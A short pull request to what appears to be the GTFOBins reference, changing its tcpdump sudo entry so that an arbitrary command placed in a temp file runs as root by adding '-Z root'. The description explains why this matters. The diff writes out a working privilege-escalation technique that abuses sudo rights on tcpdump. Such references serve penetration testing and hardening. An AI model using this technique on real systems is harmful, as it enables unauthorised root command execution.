### PR TITLE
Providing user as argument using -Z

### DIFF
--- a/_gtfobins/tcpdump.md
+++ b/_gtfobins/tcpdump.md
@@ -14,5 +14,5 @@ functions:
         TF=$(mktemp)
         echo "$COMMAND" > $TF
         chmod +x $TF
-        sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
+        sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root
 ---


### PR DESCRIPTION
If you are running tcpdump without providing `-Z (user)` argument, it'll by default run the provided command as user `tcpdump` which has low privileges.

Using `-Z root` runs it in the context of root user. One can specify other users as well!